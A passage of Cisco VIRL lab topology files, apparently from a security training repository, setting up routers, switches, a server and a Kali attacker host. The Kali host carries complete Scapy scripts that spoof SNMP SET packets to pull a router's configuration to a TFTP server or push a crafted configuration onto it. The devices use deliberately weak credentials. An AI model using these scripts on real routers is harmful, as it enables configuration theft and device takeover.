dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyFileName(6) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.6.112"),value=options.cfg_file)] ) ) s7=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=1)] ) ) send(i/s1) send(i/s2) send(i/s3) send(i/s4) send(i/s5) send(i/s6) send(i/s7) - path: /etc/default/atftpd owner: root:root permissions: '0644' content: |- USE_INETD=false # OPTIONS below are used only with init script OPTIONS="--tftpd-timeout 300 --retry-timeout 5 --mcast-port 1758 --mcast-addr 239.239.239.0-255 --mcast-ttl 1 --maxthread 100 --verbose=5 /srv/tftp"</entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.1" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <node name="iosv-1" type="SIMPLE" subtype="IOSv" location="417,76" ipv4="192.168.0.1"> <extensions> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> <entry key="config" type="String">! IOS Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! hostname iosv-1 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco ip access-list standard IN-VTY permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.255 ip access-list standard SNMP-RW permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.3 snmp-server community supersecret rw SNMP-RW line vty 0 4 transport input ssh telnet access-class IN-VTY in vrf-also exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.1 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.2 255.255.128.0 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosvl2-2 ip address 10.0.128.1 255.255.255.252 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/3 description to admin-1 ip address 10.0.128.5 255.255.255.252 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.1 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 network 10.0.128.0 0.0.0.3 area 0 network 10.0.128.4 0.0.0.3 area 0 ! ! router bgp 1 bgp router-id 192.168.0.1 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.1 mask 255.255.255.255 neighbor 192.168.0.4 activate exit-address-family ! ! ! end</entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.2" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.128.1" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="server-1" type="SIMPLE" subtype="server" location="592,287"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-1 manage_etc_hosts: true package_update: true packages: - snmp - freeradius runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ip route del default ip route add default via 172.16.1.2 ifconfig eth1 up 10.0.128.2 netmask 255.255.255.252 route add -host 192.168.0.1 gw 10.0.128.1 dev eth1 route add -host 192.168.0.4 gw 10.0.128.1 dev eth1 route add -net 10.0.0.0/17 gw 10.0.128.1 dev eth1 route add -net 10.0.128.0/30 gw 10.0.128.1 dev eth1 exit 0 - path: /home/cisco/snmp-chatter.sh content: | #!/bin/bash while true; do snmpget -v 2c -c supersecret 192.168.0.4 1.3.6.1.2.1.1.1.0 sleep 15 done owner: "cisco:cisco" permissions: '0755' </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.128.2" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> </node> <node name="iosv-2" type="SIMPLE" subtype="IOSv" location="370,291" ipv4="192.168.0.4"> <extensions> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> <entry key="config" type="String">! IOS Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! hostname iosv-2 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco username admin privilege 15 password 12345 ip access-list standard IN-VTY permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.255 ip access-list standard SNMP-RW permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.3 snmp-server community supersecret rw SNMP-RW line vty 0 4 transport input ssh telnet access-class IN-VTY in vrf-also line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.4 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.3 255.255.128.0 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.4 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 ! ! router bgp 1 bgp router-id 192.168.0.4 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.1 remote-as 1 neighbor 192.168.0.1 description iBGP peer iosv-1 neighbor 192.168.0.1 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.4 mask 255.255.255.255 neighbor 192.168.0.1 activate exit-address-family ! ! ! end</entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.3" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <node name="admin-1" type="SIMPLE" subtype="lxc" location="605,72"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: admin-1 manage_etc_hosts: true runcmd: - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.128.6 netmask 255.255.255.252 route add -host 192.168.0.1 gw 10.0.128.5 dev eth1 route add -host 192.168.0.4 gw 10.0.128.5 dev eth1 route add -net 10.0.0.0/16 gw 10.0.128.5 dev eth1 route add -host 192.168.0.1 gw 10.0.128.5 dev eth1 route add -host 192.168.0.4 gw 10.0.128.5 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1"/> </node> <annotations/> <connection dst="/virl:topology/virl:node[2]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[2]" src="/virl:topology/virl:node[4]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[4]/virl:interface[2]" src="/virl:topology/virl:node[2]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[3]" src="/virl:topology/virl:node[3]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[2]/virl:interface[3]" src="/virl:topology/virl:node[5]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[6]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[4]"/> <connection dst="/virl:topology/virl:node[7]/virl:interface[1]" src="/virl:topology/virl:node[4]/virl:interface[3]"/> </topology>
h4cker/virl_topologies/8.10-2.virl
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <topology xmlns="http://www.cisco.com/VIRL" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" schemaVersion="0.95" xsi:schemaLocation="http://www.cisco.com/VIRL https://raw.github.com/CiscoVIRL/schema/v0.95/virl.xsd"> <extensions> <entry key="AutoNetkit.infrastructure_only" type="Boolean">false</entry> <entry key="management_network" type="String">flat</entry> <entry key="AutoNetkit.enable_cdp" type="Boolean">true</entry> <entry key="AutoNetkit.IGP" type="String">ospf</entry> </extensions> <node name="iosvl2-1" type="SIMPLE" subtype="IOSvL2" location="296,180"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-1 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-2 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to kali-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet1/0 description to iosv-2 switchport access vlan 2 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> <interface id="3" name="GigabitEthernet1/0"/> <interface id="4" name="GigabitEthernet1/1"/> </node> <node name="iosvl2-2" type="SIMPLE" subtype="IOSvL2" location="520,177"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-2 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 3 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to server-1 switchport access vlan 3 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="kali-1" type="SIMPLE" subtype="kali" location="193,282"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: kali-1 manage_etc_hosts: true package_update: true packages: - quagga bootcmd: - ip route del default via 172.16.1.1 - ip route add default via 172.16.1.2 runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart - systemctl enable zebra ospfd users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/network/interfaces owner: root:root permissions: '0644' content: |- source-directory /etc/network/interfaces.d auto eth0 iface eth0 inet dhcp gateway 172.16.1.2 - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ip route del default ip route add default via 172.16.1.2 ip link set eth1 up ip addr add 10.0.0.1/17 dev eth1 # Use routes from Quagga instead #route add -host 192.168.0.1 gw 10.0.0.2 dev eth1 #route add -host 192.168.0.4 gw 10.0.0.2 dev eth1 #route add -net 10.0.0.0/17 gw 10.0.0.2 dev eth1 #route add -net 10.0.128.0/30 gw 10.0.0.2 dev eth1 #route add -host 192.168.0.1 gw 10.0.0.3 dev eth1 #route add -host 192.168.0.4 gw 10.0.0.3 dev eth1 #route add -net 10.0.0.0/17 gw 10.0.0.3 dev eth1 #route add -net 10.0.128.0/30 gw 10.0.0.3 dev eth1 exit 0 - path: /etc/network/interfaces.d/eth1 owner: root:root permissions: '0644' content: |- iface eth1 inet manual - path: /etc/quagga/zebra.conf owner: root:root permissions: '0644' content: |- hostname kali-1 password cisco enable password cisco interface eth0 interface eth1 line vty - path: /etc/quagga/ospfd.conf owner: root:root permissions: '0644' content: |- hostname kali-1 password cisco log stdout interface eth1 ip ospf cost 1 router ospf ospf router-id 10.0.0.1 network 10.0.0.1/17 area 0.0.0.0 network 192.168.0.4/32 area 0.0.0.0 network 10.0.128.2/32 area 0 line vty - path: /root/get-cisco-config.py owner: root:root permissions: '0755' content: |- #!/usr/bin/env python # See # http://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html # and # http://tools.cisco.com/Support/SNMP/do/BrowseMIB.do?local=en&amp;mibName=CISCO-CONFIG-COPY-MIB # for details from optparse import OptionParser from scapy.all import conf,IP,SNMP,SNMPset,ASN1_OID,ASN1_IPADDRESS,UDP,SNMPvarbind,send parser = OptionParser() parser.add_option("-i", "--iface", dest="iface", help="Interface", default="eth1") parser.add_option("-s", "--src", dest="srcip", help="Source IP Address", default="192.168.1.2") parser.add_option("-d", "--dst", dest="dstip", help="Destination IP Address", default="192.168.1.1") parser.add_option("-t", "--tftp", dest="tftpip", help="TFTP Server IP Address", default="192.168.1.2") parser.add_option("-f", "--cfg", dest="cfg_file", help="Configuration Filename") parser.add_option("-c", "--community", dest="snmpstring", help="SNMP Community Set String", default="secret") (options, args) = parser.parse_args() if options.cfg_file is None: options.cfg_file = "%s-config" % (options.dstip) print "Attempting to download IOS config from %s" % (options.dstip) conf.iface = options.iface i=IP(src=options.srcip,dst=options.dstip)/UDP(sport=161,dport=161) s1=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=6)] ) ) s2=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyProtocol(2) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.2.112"),value=1)] ) ) s3=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopySourceFileType(3) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.3.112"),value=4)] ) ) s4=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyDestFileType(4) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.4.112"),value=1)] ) ) s5=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyServerAddress(5) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.5.112"),value=ASN1_IPADDRESS(options.tftpip))] ) ) s6=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyFileName(6) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.6.112"),value=options.cfg_file)] ) ) s7=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=1)] ) ) send(i/s1) send(i/s2) send(i/s3) send(i/s4) send(i/s5) send(i/s6) send(i/s7) - path: /root/merge-cisco-config.py owner: root:root permissions: '0755' content: |- #!/usr/bin/env python # See # http://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html # and # http://tools.cisco.com/Support/SNMP/do/BrowseMIB.do?local=en&amp;mibName=CISCO-CONFIG-COPY-MIB # for details from optparse import OptionParser from scapy.all import conf,IP,SNMP,SNMPset,ASN1_OID,ASN1_IPADDRESS,UDP,SNMPvarbind,send parser = OptionParser() parser.add_option("-i", "--iface", dest="iface", help="Interface", default="eth1") parser.add_option("-s", "--src", dest="srcip", help="Source IP Address", default="192.168.1.2") parser.add_option("-d", "--dst", dest="dstip", help="Destination IP Address", default="192.168.1.1") parser.add_option("-t", "--tftp", dest="tftpip", help="TFTP Server IP Address", default="192.168.1.2") parser.add_option("-f", "--cfg", dest="cfg_file", help="Configuration Filename") parser.add_option("-c", "--community", dest="snmpstring", help="SNMP Community Set String", default="secret") (options, args) = parser.parse_args() if options.cfg_file is None: options.cfg_file = "%s-config" % (options.dstip) print "Attempting to upload IOS config to %s" % (options.dstip) conf.iface = options.iface i=IP(src=options.srcip,dst=options.dstip)/UDP(sport=161,dport=161) s1=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=6)] ) ) s2=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyProtocol(2) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.2.112"),value=1)] ) ) s3=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopySourceFileType(3) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.3.112"),value=1)] ) ) s4=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyDestFileType(4) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.4.112"),value=4)] ) ) s5=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyServerAddress(5) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.5.112"),value=ASN1_IPADDRESS(options.tftpip))] ) ) s6=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyFileName(6) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.6.112"),value=options.cfg_file)] ) ) s7=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=1)] ) ) send(i/s1) send(i/s2) send(i/s3) send(i/s4) send(i/s5) send(i/s6) send(i/s7) - path: /etc/default/atftpd owner: root:root permissions: '0644' content: |- USE_INETD=false # OPTIONS below are used only with init script OPTIONS="--tftpd-timeout 300 --retry-timeout 5 --mcast-port 1758 --mcast-addr 239.239.239.0-255 --mcast-ttl 1 --maxthread 100 --verbose=5 /srv/tftp" - path: /srv/tftp/router.cfg owner: nobody:nogroup permissions: '0644' content: |- ! ! Last configuration change at 23:19:07 UTC Tue Aug 29 2017 by cisco ! version 15.6 service timestamps debug datetime msec service timestamps log datetime msec service password-encryption ! hostname iosv-2 ! boot-start-marker boot-end-marker ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! enable password 7 060506324F41 ! aaa new-model ! ! aaa authentication login default group radius local line aaa authorization exec default group radius if-authenticated ! ! ! ! ! aaa session-id common ethernet lmi ce ! ! ! mmi polling-interval 60 no mmi auto-configure no mmi pvc mmi snmp-timeout 180 ! ! ! ! ! ! ! ! ! ! ! no ip domain lookup ip domain name virl.info ip cef ipv6 unicast-routing ipv6 cef ! multilink bundle-name authenticated ! ! ! ! username cisco privilege 15 secret 5 $1$WaUX$blEhl/Fee6CSV8WMIvhv4. ! redundancy ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! interface Loopback0 description Loopback ip address 192.168.0.4 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ip address 172.16.1.191 255.255.255.0 duplex full speed auto media-type rj45 ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.3 255.255.128.0 ip ospf cost 1 duplex full speed auto media-type rj45 ! router ospf 1 passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 network 192.168.0.4 0.0.0.0 area 0 ! router bgp 1 bgp router-id 192.168.0.4 bgp log-neighbor-changes neighbor 192.168.0.1 remote-as 1 neighbor 192.168.0.1 description iBGP peer iosv-1 neighbor 192.168.0.1 update-source Loopback0 ! address-family ipv4 network 192.168.0.4 mask 255.255.255.255 neighbor 192.168.0.1 activate exit-address-family ! ip forward-protocol nd ! ! no ip http server no ip http secure-server ip ssh server algorithm authentication password ! ip access-list standard IN-VTY permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.255 ip access-list standard SNMP-RW permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.3 ! ip radius source-interface Loopback0 ! snmp-server community supersecret RW SNMP-RW snmp-server chassis-id ! ! ! radius server RADIUS address ipv4 10.0.128.2 auth-port 1812 acct-port 1813 key 7 13061E0108030723382727 ! ! control-plane ! banner exec ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User 